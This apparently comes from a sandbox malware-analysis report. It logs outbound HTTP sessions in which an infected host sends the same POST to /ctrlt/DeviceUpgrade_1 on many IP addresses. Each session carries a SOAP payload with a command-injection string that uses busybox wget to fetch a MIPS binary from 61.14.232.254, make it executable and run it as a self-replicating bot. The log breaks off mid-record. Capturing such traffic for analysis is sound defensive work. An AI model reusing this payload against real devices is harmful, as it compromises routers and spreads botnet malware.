                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2053192.168.2.1338292157.18.198.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689203024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2054192.168.2.1349192197.44.161.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689218044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2055192.168.2.1343414197.223.73.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689237118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2056192.168.2.134475041.142.231.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689492941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2057192.168.2.1338904197.91.250.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689528942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2058192.168.2.1342820197.64.246.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689552069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2059192.168.2.133943287.172.107.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689552069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2060192.168.2.1351362119.214.155.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689570904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2061192.168.2.134781641.215.96.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689588070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2062192.168.2.1335894197.228.67.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689588070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 